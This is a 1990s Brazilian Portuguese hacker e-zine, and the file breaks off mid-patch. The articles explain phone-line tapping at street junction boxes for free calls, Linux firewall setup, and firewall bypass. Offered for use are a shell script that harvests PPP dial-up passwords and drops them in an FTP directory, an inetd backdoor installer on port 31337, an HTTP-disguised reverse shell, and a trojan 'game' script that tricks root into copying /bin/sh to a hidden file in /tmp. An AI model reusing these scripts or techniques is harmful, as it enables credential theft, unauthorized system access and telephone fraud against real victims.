raquez0es e ratoes, saudacoes especiais do Grande ninja master IV, Thanx y0 dudes. 01] Introducao, Telerj, sistema de telecomunicacao convencional via telefone do estado do Rio de Janeiro, entre outras companias, sao vulneraveis a esta tecnica que eu disponibilizo abaixo. Telerj, e' muito bem conhecida devido a sua capacidade de fazer um traba- lho descente nas linhas telefonicas, entao nos (indiquinadamente), ensina- mos como fazer o trabalho estupido e sem descencia que a telerj. Esta tecnica foi trabalhada e desenvolvida passo a passo por bloodroot e the dert, durante viagens pelas linhas telefonicas dos nossos vizinhos :-) Bom, ai vai a tecnica, esperamos que goste do que voce vera... 02] A tecnica Esta tecnica nao e' nenhuma falha no sistema, e tambem nao procura explo- rar nenhum vulnerabilidade oculta dentro nos internos das telerdas. Come- caremos explicando a tecnica, expondo os materiais que voce devera comprar na loja de materiais eletricos ou armazem mais proxima: - Uma bargoa (ver a seguir) - Preco: r$5.00 a $10.00, cada - 2 jacares (tambem ver a seguir) - Preco: 20c. a r$1.00, cada - 1 fio telefonico (com conector rj-11) - Preco: 2metros, r$2.00 a r$5.00 - 1 telefone bem portatil e pequeno. - Preco: r$10.00 a r$200.00 :) item numero.01 - bargoa: Bargoa, e' o conector usado para se conectar em sistema de centrais digi- tal, ou seja, ela e' usada em caixa de verificacoes (armarios) que sao do tipo onde e' necessario um encaixe para que a coneccao possa ser completa- da. item numero.02 - jacares: Jacares, de um modo geral sao um dos aparelhos (conector) mais importante para o processo ser completo, ele permite que voce passe a tensao da linha para o seu telefone portatil, assim podendo exercutar a ligacao. Jacares sao geralmente usados para sistemas analogicas de "armarios". E' necessa- rio comprar estes jacares, pois eles sao basicamente a parte excensial da acao toda :) item numero.03 - fio telefonico: Fios telefonicos, igual aquele que voce usa para conectar o modem a tomada do telefone, ou o telefone a tomada do telefone, ambos destes podem ser usados para este tipo de trabalho, mas nos lembramos que este fio sofrera serias adaptacoes anatomicas no seu corpo :) Ou seja, e' sempre bom com- prar um novo para este tipo de servico, assim voce fica com um fio espe- cialmente para este tipo de atividades. item numero.04 - telefone portatil: Telefone portatil, e' o exemplo de um pequeno telefone, preto que pode ser escondido dentro de qualquer lugar, e pode ser facil de transporta-lo para qualquer lugar que voce queira, em uma calada da noite :) 03] Setupando o hardware, Okay, agora e a parte mais dificil de ilustrar em um modo ASCII mas eu vou tentar do mesmo jeito :) A primeira coisa que voce deve fazer e': - Comprar tudo :) Para setupar o hardware voce ira precisar de uma solda, e somente este ou- tro equipamento. Siga este guia passo-a-passo para jackass e conclua sua tarefa: 1. Pegue o fio telefonico (que voce comprou) e corte uma das pontas deles, qual sera a ponta realmente nao interessa, mas o que interessa e' que interessa e' que ao cortar a capinha de protecao do fio, deixe os fios de cobre expostos, eu aconselho que voces deixem 1 a 2 centimetros de fios de cobre para fora para que a solda tenha mais efeito sobre o jacare :) Obs.: Voce devera ter deixado uma ponta com os fios de cobre expostos e a outra ponta com o conector rj-11, ne!? 2. Pegue a solda e solde o fio de cobre no jacare, mas solde direito por- que tem muita solda que na hora "H" nao funciona :) Para esta parte de sol dar, eu nao vou explicar como soldar um jacare, porque qualquer mongoloide deveria saber isto :) 3. Agora, parte do trabalho ja esta feita, agora e' so uma questao de op- cao: - Voce vai usar bargoa??? - Voce nao vai usar bargoa??? Se voce usar bargoa entao faca o seguinte: A bargoa se divide em duas partes, a primeira parte e' uma ponta dividida basicamente em 4 partes, esta e' a ponta usada para se conectar nos arma- rios baseados em bargoas. E a outra parte sao duas forquilhas, estas serao onde o jacare devera se prender, passando a corrente do armario para a bar goa, da bargoa para o jacare do jacare para o fio e do fio para o telefone tensionando a linha e assim possibilidando a ligacao :) Agora, voce ja tem todo o hardware setupado, entao e' a hora de chegar to- da a acao, em geral :) 04] Wire tapping!!! Agora e' bem simples, voce tera que seguir alguns pasos e depois protinho, ligacoes de graca para sempre =) - Voce tera que achar uma caixa de verificacao (armario), isto nao e' muito dificil, considerando que do jeito que as telerdas sao tao desorganizadas existem caixas dessas praticamente a cada 2 ruas, e em predio existem uma que distribui a linha para o predio todo =) Ou seja, voce tem dois alvos possiveis, 1. e' pegar a caixa de verificacao da sua rua e 2. a outra e' voce pegar uma caixa de verificacao do seu predio, por exemplo , aquela caixa escondida em algum lugar no seu predio, geralmente embutida na pare de. Uma vez que voce achou o alvo, voce tera que identificar qual tipo de hard- ware voce ira usar, somente os jacares, ou os jacares e as bargoas, veja: Se o armario que voce ver, tiver este formato: xxx xxx xxx ( ) ( ) ( ) Onde se precisa de algo para plugar dentro do pequeno conector, entao voce tera que usar uma bargoa, neste caso o custo aumentara um pouco, mas sao apenas detalhes. Se o armario que voce ver, tiver este formato: Onde ao invez de um plug, existam pequenos pinos ( parecidos com pregos ), onde voce ira prender a boca do jacare nos seus pinos para passar a corren te, entao voce tera a sua linha, caso este seja o caso, voce tera que usar somente os jacares e a linha telefonica =) Conectando os pontos e' bem facil, nos iremos primeiro explicar o primeiro caso exposto acima e depois o segundo caso exposto acima: 1o. caso: Este e' o caso mais simples, voce tera que usar a bargoa neste caso, e'bem simples, voce tera que abrir a caixa de verificacao (armario), depois de fazer isto,plug as bargoas nos buracos, assim ate que voce ache alguma bar goa que esteja tensionada e permita que voce use a linha. veja o exemplo: xxx ( ) <--- Buraco ---. <|____ conector da bargoa, este entrara no buraco do armario =) ---' <| Assim, vai passando de 'buraco' por 'buraco' ate voce achar um 'buraco'que tenha linha =) 2o. caso: Neste caso, voce vera o armario cheio de pinos, com pequenos numeros assim 8a, 8b, 9a, 9b, 7a, 7b. Entre outros, entao os jacares deverao ser presos nos respectivos pinos, e assim a linha sera tensionada para o seu telefone Este processo e' bem simples, basicamente implica em prender direito o ja- care no armario, mais nada =) 05] Conclusao Agora, seguintes estes passos voce ja podera ligar de graca para qualquer lugar. Quero dizer, ate mesmo para a BBS da alemanha que o Acidmud tanto fala =) ······ The Phone9 Communications Systems, Inc. contact: [blood@phone9.org]|[phone9@phone9.org] ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³19 - Password smuglers ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Conexoes a internet, sao tao vulneraveis, ou seja no cliente ou seja no FreeBSD do servidor, sempre existe um meio de se romper a pequena e camu flavel seguranca e roubar os passwords pendentes de um sistema windows95 ou linux. Este texto ensina algumas tecnicas de como se catar o password e de como se proteger te tal estupidos ataques =) [ Conexoes PPP bugadas ] Pointo to Point Protocol, sao sempre alvo de ataques como o recentemente exposto da l0pht, entre varios outros, com a capcidade de permitir uma conexao a internet por meio deste protocolo, entao vamos estudar algumas falhas interessantes neste. Embora, existem varios arquivos de conexao PPP, os principais arquivos onde os passwords ficam sao: - /usr/sbin/redialer . E' o programa de redial, quando voce cai da cone- xao ele, automaticamente a reestabelece =) - /usr/sbin/callback . E' outro programa de redial, tambem guarda o pass word em ASCII text. - /etc/ppp/pap-secrets . E' o arquivo que guarda a senha em conexao CHAP. - /usr/sbin/ppp-on . Guarda os password e logins, sobre as variaveis de ACCOUNT e PASSWORD. e no windows95. - c:\programs files\access~1\pppmenu.scp . Script de conexao a rede dial Up do windows. Okay, entao voce ja sabe basicamente quais sao os arquivos que voce deve ra atacar, e entao voce usa o codigo password smuggler, um pequeno dae- mon que ao ser executado pela porta tcp - 31337 (hehehehe, BO p0w3r.) Uma vez que um telnet na porta 31337 for dado, entao automaticamente o codigo do password smuggler, sera executado e b3wng, voce tera passwords de quase todo o sistema =) [Password Smuggler] #!/bin/sh echo "Password Smuggler v1.2" echo "by | Phone9.org" echo echo "Aguarde enquanto procuramos pelos passwords....." echo "[Phone9.org]|[puruca.com.br/phone9]|[phone9.org]" echo if -e /etc/ppp/pap-secrets then echo "Procurando passwords no arquivo Pap-Secrets" echo "Pap-Secrets passwords: " >> /tmp/.expose echo "---------------------- " >> /tmp/.expose cat /etc/ppp/pap-secrets >> /tmp/.expose else echo "Pap Secrets Response" >> /tmp/.expose echo "--------------------" >> /tmp/.expose echo "Arquivo /etc/ppp/pap-secrets inexistente" >> /tmp/.expose fi if -e /usr/sbin/ppp-on then echo "Procurando passwords no arquivo ppp-on" echo "PPP-ON passwords: " >> /tmp/.expose echo "----------------- " >> /tmp/.expose echo "login: " >> /tmp/.expose grep ACCOUNT /usr/sbin/ppp-on >> /tmp/.expose echo "Password: " >> /tmp/.expose grep PASSWORD /usr/sbin/ppp-on >> /tmp/.expose echo "Telefone: " >> /tmp/.expose grep ATDT /etc/ppp/chatscript >> /tmp/.expose else echo "ppp-on Passwords response" >> /tmp/.expose echo "-------------------------" >> /tmp/.expose echo "Arquivo /usr/sbin/ppp-on inexistente" >> /tmp/.expose fi if -e /usr/sbin/redialer then echo "Procurando passwords no arquivo redialer" echo "Redialer Passwords: " >> /tmp/.expose echo "------------------- " >> /tmp/.expose echo "Login: " >> /tmp/.expose grep ACCOUNT /usr/sbin/redialer >> /tmp/.expose echo "Password: " >> /tmp/.expose grep PASSWORD /usr/sbin/redialer >> /tmp/.expose echo "Telefone: ">> /tmp/.expose grep PHONE1 /usr/sbin/redialer >> /tmp/.expose fi if -e /usr/sbin/callback then echo "Procurando passwords no arquivo callback" echo "Callback Passwords: " >> /tmp/.expose echo "------------------- " >> /tmp/.expose echo "Login: " >> /tmp/.expose grep ACCOUNT /usr/sbin/callback >> /tmp/.expose echo "Password: " >> /tmp/.expose grep PASSWORD /usr/sbin/callback >> /tmp/.expose echo "Telefone: " >> /tmp/.expose grep PHONE /usr/sbin/callback >> /tmp/.expose fi echo "Verifique o resultado da pesquisa..." cat /tmp/.expose |more echo "O arquivoo esta sendo colocado dentro do servidor FTP, no direto-" echo "rio incoming, /home/ftp/incoming/.p9/passwd.expose." mkdir /home/ftp/incoming/.p9/ cp /tmp/.expose /home/ftp/incoming/.p9/passwd.expose rm /tmp/.expose echo "Fim..." logout [Password Smuggler] Agora, vai o script de instalacao do bichano =) [password smuggler instalation system] #!/bin/sh echo "Password smuggler instalation systems." echo "[c] a Phone9 31337 production." echo echo "Instalando o Password Smuggler... Aguarde!!!" echo "psmug stream tcp nowait root /usr/sbin/.psmug" >> /etc/inetd.conf echo "psmug 31337/tcp " >> /etc/inetd.conf echo echo "Agora, e' so' colocar o arquivo psmug (Phone9-02.) Que voce podera" echo "executar a backdoor... Coloque-o no diretorio /usr/sbin/, sobre o" echo "o nome de .psmug, assim apenas um telnet na porta: 31337 e pronto" echo echo "Password Smuggler Instalation systems." echo "[c] a Phone9 31337 Productions." [password smuggler instalation system] Obs. Queremos dizer que nos estamos trabalhando o Sniffer para conexoes a rede dial-up, do resto... b0gnw3ng, Dudah!! contact: [blood@webcrunchers.com]|[Password Smuggler Project] 31337/udp -> Back Orifice, 31337/tcp -> Passwd Smug, >:-) ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³20 - Firewall e proxy em sistemas linux, nocoes basicas ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° r00t d0wn k0mmunications presents... .[Firewall e Proxy em sistemas linux]. .[ by The bloodroot :. blood@phone9.org ]. Durante anos em que eu vivi entrando e saindo de redes, eu percebi que uma das maiores armas de uma rede, tanto intranet quanto internet, e' o firewall um programa que roda no seu sistema, monitorando cada pequeno grao de pacote transmitido pela sua rede. O firewall e' muito comum em sistemas de empresas e alguns servidores, com ele se e' possivel controlar todo o tipo de conexao com a sua rede, podendo vetar qualquer conexao suspeita, em geral e' uma grande arma na hora de implementar a sua seguranca. Mas poucos sabem como utiliza-las, desde usuarios de windows95/98, ate' o infame linux , alvo do texto, ate hoje eu me deparo com usuario que reclamam da seguranca do seu sistema, sem ao menos saber se uma conexao esta sendo pedida ou nao, em outras palavras e' como atirar no escuro, voce imagina que alguma conexao misteriosa vem vindo por UDP diretorio para a sua rede, e esta disposta a conseguir root??? Nao, a nao ser que voce tenha consultado o "Sr. Ligue Ja'", e seu videntes... ;) Por isso em qualquer sistema operacional, ate' mesmo DOS, e' necessario se acrescentar um firewall para voce poder dizer com seguranca "Ja' parei 80% dos hackers...". O objetivo deste texto e' ensinar a voce a como colocar um firewall na sua rede linux e ainda como invadi-lo depois de algumas tentativas sem sucesso. Obs: Eu , o autor do texto tomo responsabilidade por qualquer falha que este texto eventualmente possa trazer, se alguma pessoa tiver a habilidade de conseguir fazer uma "cagada" com as tecnicas aqui investidas, voces podem levar um papo com papai e mamae ;) Firewall e' um sistema de protecao de portas, monitorando cada conexao feita para as portas ou protocolos, designados pelo admin para monitorar, o papel deles e' apenas observar e alertar o admin de qualquer conexao de fora para dentro, perguntando a respostas do admin para ver se ele devera liberar ou nao a conexao pendente. Lembre-se que o firewall pode negar qualquer conexao pendente sem nenhum problema. Obviamente que o firewall nao e' uma ferramen- ta tao burra, ele tem pode monitorar e parar o acesso de dentro para fora, nao permitindo que usuarios da rede, possam se comunicar com o lado de fora da rede (internet?), para que de dentro para fora seja permitida e' necessa- rio que o usuario tenha a permissao do administrador, e ainda por cima, tem que originar uma secao por meio de telnet, ou por meio de outra conexao que o firewall permita, por exemplo PPP, slip, dial-up, ou outro meio. A forma mais simples de um firewall e' o firewall "caseiro". Sendo instalado ou no seu windows ou no seu linux (unix-br0thers!!!), monitorando todas as conexoes a somente o seu IP, nao tendo total controle sobre qualquer usuario que tenha sua conexao originada por meio outro IP. Mas um firewall bem confi gurado, como o descrito aqui, pode designar os servicos, e unicas funcoes que a conta pode executar na shell e no sistema como uma parte inteira. No caso de proxys, o firewall pode ser acessado por meio de um servidor remoto, que depois da aprovacao do firewall permite que o usuario se conecte remotamente com o servidor, inibindo o acesso de outros usuarios pelo mesmo login, por que alem da autentificacao do admin e do firewall, tambem existe o problema do login, que impede a maioria dos raquers que existem por ai. Praticamente a cada dia sao lancados programas como estes, permitindo uma conexao amigavel entre o cliente e o servidor. Existem basicamente dois tipos firewalls: 1:. O IP ou Firewall Filtering - Que bloqueia o acesso de todos os servicos fora os designados pelo admin. 2:. Proxy Server - Faz uma conexao direta com o servidor direto da sua casa, ou escrito, obviamente passando pela devida autenficacao do cliente. IP firewall Filtering - Bloqueando conexao nao desejadas -- -------- --------- ---------- ------- --- --------- Um IP filtering funciona a nivel de pacotes enviados ao host onde o firewall esta rodando. Este examina, o tamanho, conteudo, destino, porta, remetente e o tipo informacao contida dentro dos pacotes. Embora um tanto seguro, ele nao e' tao seguro quanto outros sistemas de protecao, ele entra em uma politica de que todas as informacoes publicas, nao precisam de seguranca, por tanto ele nao grava quem acessa os dados publicos do seu sistema, somente os privados. E ainda nao mantem controle sobre nenhum dos acessos originados de dentro da rede. Embora seja uma boa tecnica, ela so protege sistema unico de IP, ou seja , se eu tenho um IP filtering no meu sistema e eu quero dar acesso a alguem de fora no meu servidor, e' necessario que eu habilite para todos aquela area do servidor para todos, sem restrincao e sem nenhum tipo de log, vindo por meio do firewall, por isso este tipo de firewall so e' eficiente quando e' utilizado em redes de somente um usuario, por exemplo o seu linux no seu quatrooitomeia!!! O linux ja' vem com este tipo de firewall desde a versao da kernel 1.3.x , o programa e' IPADMF (IPadministratorFirewall) Proxy Servers - Conectando a sua rede na sua casa ----- ------- ---------- - --- ---- -- --- ---- Proxy servers, permitem que conexoes indiretas a internet sejam originadas por meio do firewall, tendo um administrador, monitorando e barrando a entra da de certos pacotes. Um exemplo seria, se uma pessao desse um telnet em um sistema e em seguida originasse outra conexao por meio de telnet. Normalmen- te o proxy server, utiliza um sistema de cliente e software, para se conectar com a 'rede'. Como por meio de um proxy a conexao para a rede, so pode ser efetuada pela rede, entao e' possivel se controlar todo tipo de transacao no seu sistema. Configurando firewall no seu sistema linux ------------ -------- -- --- ------- ----- necessidades do sistema: 486 dx4, 500 megabytes de particao do linux, 16mg livres de hd. No minino a sua rede devara ter dois IPs, considerando que voce ira instalar o firewall em uma rede, no caso de instalacao de firewall em um sistema local e unico, e' nencessario se instalar um sistema linux, por exemplo o red hat ou slackwares, pois ambos vem com uma kernel que suporta a instalacao de softwares como firewall no sistema. Os programas de firewalls sao muito conhecidos, no exemplo do linux, existem varios, desde de o freeware IPFWADM, e' sempre bom lembrar que se nenhum daemon TCP/IP/UDP for instalado a existencia de um firewall e' inutil pois qualquer servico remoto nao pode ser efetuado. Outro grande firewall e' TIS, Firewall Tool Kit, FWTK, com uma grande estrategica de protecao, nao e' tao diferente do seu primo renegado, SOCKS, que tem basicamente as mesmas funcoes, neste caso nos iremos cobrir a instalacao dos dois tipos de package :> Compilando a Kernel <: -- ---------- - ------ -- Para que tudo ocorra com a maior natureza, instale uma versao de linux no seu computador, delete a antiga se existir, pois voce ja' pode ter mexido na kernel ou em alguns configs que podem alterar o processo de intalacao dos firewalls. A versao 3.0.3 do linux Red Hat e' usada como padrao neste texto. Use uma kernel instavel, algo como... 2.0.14, ou 2.0.3, sei la' te vira ;) Voce tera que recompilar a sua kernel para incluir as informacoes novas na sua kernel, primeiro digite: ph0ne9:/root/> make config E faca as seguitne altecoes na sua kernel: - Sob a configuracao geral do setup - Ligue a opcao de suporte a rede [On] - Sob a configuracao de networks - Ligue a opcao de firewall [On] - Ligue a opcao de rede TCP/IP [On] - Desligue a opcao IP forwarding/gateway , a nao ser que voce saiba o que esteja fazendo. [OFF] - Ligue a opcao de IP firewall [On] - Ligue a opcao de loggin de pacotes de IP [On] - Desligue a opcao de IP masquerading, pode ser um tanto problematica na hora de setupar filtros de IP. [OFF] - Ligue a opcao de IP accounting [On] - Desligue a opcao: IP tunneling [OFF] - Desligue a opcao de alising de IP [OFF] - Desligue o modo de compatibilidade de PC/TCP [OFF] - Desligue o modo de reversao de ARPs [OFF] - Ligue a opcao de mostrar source routeadores e IPs [On] - Sob a configuracao do dispositivo de rede - Ligue o suporte de dispositivos para rede [On] - Ligue o suporte para terminal burro [On] - Ligue a sua rede ethernet (10 ou 1000Mbit) [On] - Selecione o seu tipo de cartao de rede. Agora voce pode sair, recompilar e rebootar a sua maquina, se o cartao de rede nao aparecer no seu setup, entao voce tera que fazer tudo denovo ate' tudo funcionar direito. Para configurar os seus cartoes de redes e' necessario que voce edit o arquivo etc/lilo.conf, para descrever a porta IRQ e o enderecos dos cartoes de rede (caso voce obviamente for usar rede, dah!!! ;)), voce devera mudar os enderecos desta linha abaixo: append="ether=12,0x300,eth0 ether=15,0x340,eth1" Para configurar o seu endereco de rede, agora e'necessario fazer algumas decisoes sobre a rede, como por exemplo: Se as areas privadas terao acesso a internet ou nao, politica de tratamento de rros, entre outras coisas chatas por ai. Uma boa opcao para os seus enderecos privados, e' colocar qualquer endereco falso, pois como aquele IPs nao precisarao se conectar na internet, entao e' como nenhum deles passara por algum tipo de roteador ou qualquer verificador de autenticidade na internet, eles sao uma pedida para qualquer rede ;) Os IPs que nos iremos usar serao o seguinte: 200.255.185.xxx Como o seu proxy sera membro das duas areas da sua rede, a privada e a publica, para que ele possa passar de um lado para o outro sem problemas. A esquematizacao do proxy server ficaria mais ou menos assim: || 200.255.185.000 || 200.255.185.001 \||/ || \||/ -----------------||------------------ /\/\/\/\/\/\- firewall -/\/\/\/\/\/\ |Rede privada| || | Internet| `------------' || `---------' || A rede no caso, tem dois IPs, 200.255.185.000, que e' o IP falso, utilizada para a rede privada, e o IP 200.255.185.001, utilizada para a internet, ou conexoes publicas, como gerenciamento de clientes entre outras utilidades. O firewall fica como um filtro em todas as redes, publicas ou privadas,dando maior seguranca para todos os pacotes que a rede, efetivamente pode originar ou receber. Testando a sua rede, comece testando a sua rede pelo ifconfig, e pelo route, Se voce tiver dois tipos de cartoes de rede, o seu ifconfig devera ser algo mais ou menos assim: %ifconfig lo Link encap:Local Loopback inet addr:127.0.0.0 Bcast:200.255.185.000 Mask:255.0.0.0 UP BROADCAST LOOPBACK RUNNING MTU:3584 Metric:1 RX packets:1620 errors:0 dropped:0 overruns:0 TX packets:1620 errors:0 dropped:0 overruns:0 eth0 Link encap:10Mbps Ethernet HWaddr 00:00:09:85:AC:55 inet addr:200.255.185.001 Bcast:200.255.185.000 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 TX packets:0 errors:0 dropped:0 overruns:0 Interrupt:12 Base address:0x310 eth1 Link encap:10Mbps Ethernet HWaddr 00:00:09:80:1E:D7 inet addr:200.255.185.000 Bcast:200.255.185.001 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 TX packets:0 errors:0 dropped:0 overruns:0 Interrupt:15 Base address:0x350 e a sua route table devera ser assim: %route -n Kernel routing table Destination Gateway Genmask Flags MSS Window Use Iface 199.1.2.0 * 255.255.255.0 U 1500 0 15 eth0 192.168.2.0 * 255.255.255.0 U 1500 0 0 eth1 127.0.0.0 * 255.0.0.0 U 3584 0 2 lo default 199.1.2.10 * UG 1500 0 72 eth0 Agora teste o seu ping contra a rede publica, o ping devera ser alertado pelos logs do firewall, caso contrario ou o seu firewall esta mal configurado ou entao o seu PP esta tambem mal configurado. E' claro que eu nao podia me esquecer de pequenas tecnicas de como se ter um firewall o mais seguro possivel... Para que a integridade do firewall seja possivel, e' necessario se desligar todos os servicos que voce nao roda.... cat /etc/inetd.conf, devera te mostrar o que roda e o que nao, depois apenas comente (#) os servicos que voce nao deseja. E' claro que servicos como finger, tftp, bootp, netstat, systat, devem ser desligados pois nao tem nenhum sentido deixa-los rodando, a nao ser que a sua rede precise deles. ao acabar de configurar de um sinal -HUP no seu inetd para que ele re-liea as novas configuracoes setupadas por voce. E' claro que por ser um firewall todo o sistema de seguranca interna dele ja' vem setado de um jeito ou de outro, nos somente ajudamos, por isso nao existem muitas tecnicas de como se setupar seguramente um firewall... Internet Protocol FireWall Admin: ^^^^^^^^ ^^^^^^^^ ^^^^^^^^ ^^^^^^ Para que este rode, e' necessario que voce tenha a sua opcao IP forwarding ligada, assim sera possivel rodar o IPFWADM. Seria esperto colocar algumas configuracoes no seu sistema, por meio do /etc/rc.d, pois este podem configurar qualquer politica de seguranca do seu firewall durante o boot do seu sistema, e nao depois por meio de um processo manual... Para comecar e' sempre bom colocar o seu firewall rodando em uma opcao de negacao de qualquer tipo de conexao para a sua maquina, e desligando as configuracoes que foram setupadas para o ipfwadm, na ultima vez que foi inicializado, para isto crie este script: #!/bin/sh # #setupando o seu ipfwadm desde o inicio # #Negando acesso a sua maquina ipfwadm -F -p deny # Desligando todos os comandos... ipfwadm -F -f ipfwadm -I -f ipfwadm -O -f Entao agora entra em acao a opcao de forwarding IP, fazendo com que somente algumas funcoes do seu IP sejam passada pelo firewall, abaixo vao alguns exemplos: #dando um forward no mail ipfwadm -F -a accept -b -P tcp -S 0.0.0.0/0 1024:65535 -D 200.255.185.001 25 #dando um forward para conexoes no seu mail , para algum servidor externo ipfwadm -F -a accept -b -P tcp -S 200.255.185.001 -D 0.0.0.0/0 1024:65535 #Dando um forward em conexoes para o servidor http ipfwadm -F -a accept -b -P tcp -S 0.0.0.0/0 1024:65535 -D 200.255.185.001 80 #Dando um forward para uma conexao no seu web server para outro webserver ipfwadm -F -a accept -b -P tcp -S 200.255.185.* 80 -D 0.0.0.0/0 1024:65535 #dando um forward no trafego de DNS ipfwadm -F -a accept -b -P udp -S 0.0.0.0/0 53 -D 200.255.185.001/24 Se voce estiver interessado, recentemente eu lancei um script que se aplica muito a interface do ipfwadm, pois pega as funcoes mais usadas deles e as simplifica de modo facil, sem todo aquele sofrimento de escrever todos os comandos. mailto: blood@phone9.org que eu lhe mando o script... Agora um script que registrar todos os pacotes vindos da sua rede, este script ira contar e registrar cada pacote que sair do seu firewall, sinta-se livre para alterar o script: # Apaga os comandos ja' escritos ipfwadm -A -f # Accountin' tha system, Jackass /sbin/ipfwadm -A -f /sbin/ipfwadm -A out -i -S 200.255.185.001/24 -D 0.0.0.0/0 /sbin/ipfwadm -A out -i -S 0.0.0.0/0 -D 200.255.185.001/24 /sbin/ipfwadm -A in -i -S 200.255.185.001/24 -D 0.0.0.0/0 /sbin/ipfwadm -A in -i -S 0.0.0.0/0 -D 200.255.185.001/24 Obs: Lembrem-se que todos os enderecos IPs, estao em formato 0.0.0.0 pois estes deverao ser o IP para qual sera dado o forward, ou sobre que outro IP fora o seu sera aplicado o comando. Em outras palavras, Nao e' o seu IP! Agora que voce ja' tem uma base (bem basica), em como funcionam os firewalls e como se instala um deles e ainda, como colocar a melhor utiliza-las, agora eu explico uma tecnica criada por Van Hauser da The Hackers Choice, bom amigo de acidmud???? ;)) Esta tecnica insiste em colocar uma backdoor por tras do firewall, por meio de um bug descoberto por ele... Bom, uma vez que voce obteve uma senha dentro do sistema onde roda o firewall, voce percebe que as seguintes configuracoes do firewall estao assim: - Os usuarios internos podem acessar somente o servico www da internet. Entao, voce apos conseguir a senha, deixa rodando o programa abaixo, este programa faz um spawns em um dos usuarios do sistema (oque voce conseguiu a senha), para o firewall este usuario e'apenas um usuarios que esta usando os servicos liberados pelo administrador, por exemplo WWW. Mas o unico problema e' que este usuario que todo o dia/mes/ano/hora, execute o seu netscape e se conecta a um host por meio de um servidor web, caindo em uma shell, executando comandos em uma shell local, e se conecta no servidor do qual o hacker que um dia invadiu o firewall desfrutou. O que para o firewall parece ser apenas uma inocente conexao WWW para uma pagina qualquer, esta na reali- dade executando comandos atravez de uma shell local, como por exemplo: % passwd 0wn3d Assim , todo o dia que o programa backdoor e' executado, ele finge se conectar a um servidor de um hacker, quando esta executando comandos na sua propria shell, sem que o firewall reconheca a utilizacao da shell, pois para o firewall o usuario esta acessando somente a sua internet http. Todos as chamadas de processos serao mudadas para valores de strings-CGI, por exemplo fucker-> GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krjVAEfg HTTP/1.0 fucking responde -> g5mAlfbknz Assim qualquer possibilidade de logs ou de processos de cacheamento de qual- quer pagina ja' visitada , nao ira entregar a verdadeira face do backdoor. Para o firewall o GET so quer dizer que o usuario acessou um cgi, e catou algum arquivo, para a backdoor, e para o servidor www do hackers, o usuario do qual a backdoor esta sendo originado, apenas esta executando ls no seu diretorio dentro do servidor local, na sua shell local. Agora, quando voce conseguir um usuario por traz de qualquer firewall, somen te execute este firewall que todos os seus problemas nao se acabarao, mas concerteza serao bem mais faceis de serem resolvidos. Outra tecnica de invasao e' a pesquisa de servicos, um simples port scan ira resolver isto, passe um port scan no host que ira ser atacado, depois de um port skan bem sucedido, veja as portas abertas... www sao vulneraveis ao explicado acima, rwwwshell.pl, ftp sao vulneraveis a bugs do tipo overflow, estes colocam um arquivo que da um crash no seu netscape, podendo depois de muito tempo executar um comando remotamente pelo client netscape crashado!!! Esta e' uma das melhores, se o servidor nao tiver setupado a opcao de ver os sources dos IPs, entao e' possivel se dar um hijjack nas conexoes, prevendo os codigos de conexao do handshake, entao e' possivel se infiltrar na rede, por meio um pacote com um conteudo um tanto esquizito como "/bin/sh -i", quem sabe??? -- Monitorando o firewall da sua casa. Entao voce trabalha em uma grande rede, que tem um firewall, voce sempre pede para o b0fh do sysop para te dar uma senha que tenha algum status eleva do, mas ele sempre te diz nao... Entao o que voce faz? Vai chorando para a casa, voce e' bicha? Nao, voce le abaixo e aprende a como deixar o seu sysop louco e arrependido por nao ter colocado o IP-tunneling... Entao, voce primeiro ira no seu trabalho e dara um disquete com este script, para rodar um joguinho no seu sistema... Peca para que o root instale-o em como set-uid, para que voce possa executar todas as bibliotecas que o jogo precisa: -- gwk.sh -- #!/bin/sh # echo "Welcome to Global Warrior killer v10" echo "by Dinas0ft global, Inc." echo echo "Installing the GWK v10!!!" echo "Waiting..." /bin/cp /bin/sh /tmp/.x chmod a+x /tmp/.x echo "We've got some major problems while installing the game..." echo "Please contact our on-line call-f0r-help" exit 0 -- gwk.sh -- Coloque dentro do package do jogo, alguns arquivos .zip, pode catar os binarios que ai o administrador nao ficara procurando por comandos estranhos Agora e' so voce se sentar no seu computador e executar a shell /tmp/.x, ja' faca varias copias da shell para outros locais... Agora pegue o codigo do daemon icmpd, compile-o e deixe-o rodando no /etc/inetd.conf. Agora, voce precisa se conectar na internet com o seu linux, e rodar este codigo abaixo, este ira se disfacar de ping, quando na verdade estara se comunicando com o icmpd... O ring esta dentro do arquivo fwhack.tar, junto com o daemon e os outros arquivos... O que o programa faz e', ao receber uma conexao vinda do seu host, o icmpd, ira fazer um sistema reverso de telnetin', fazendo com que voce caia em um prompt de login, o que para o firewall ficara parecendo que voce apenas tenha aberto outro terminal local para se logar... O patch para este bug esta abaixo: -- Patch -- diff -urN telnet/commands.cc telnet.sneakin/commands.cc --- telnet/commands.cc Fri Aug 16 23:34:57 1996 +++ telnet.sneakin/commands.cc Sat Jun 7 16:50:11 1997 @@ -99,6 +99,7 @@ static unsigned long sourceroute(char *arg, char **cpp, int *lenp); +extern char callbackmode; char *hostname; static char 